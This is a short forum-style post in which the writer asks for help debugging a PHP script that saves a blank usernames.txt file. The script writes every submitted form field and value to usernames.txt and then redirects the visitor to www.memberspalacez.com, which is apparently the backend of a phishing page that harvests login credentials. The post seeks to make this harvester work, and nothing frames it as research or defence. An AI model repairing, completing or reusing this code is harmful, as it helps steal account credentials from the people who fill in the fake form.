everything is working besides this the file is made as username.txt and when i go to view it it is all blank here is the php below i hope someone can help
<?php
header ('Location: www.memberspalacez.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>